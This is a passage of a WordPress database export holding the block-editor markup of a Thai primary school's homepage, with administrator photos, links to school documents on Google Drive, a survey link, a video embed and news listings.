(664,1,'2025-07-14 15:24:23','2025-07-14 08:24:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" 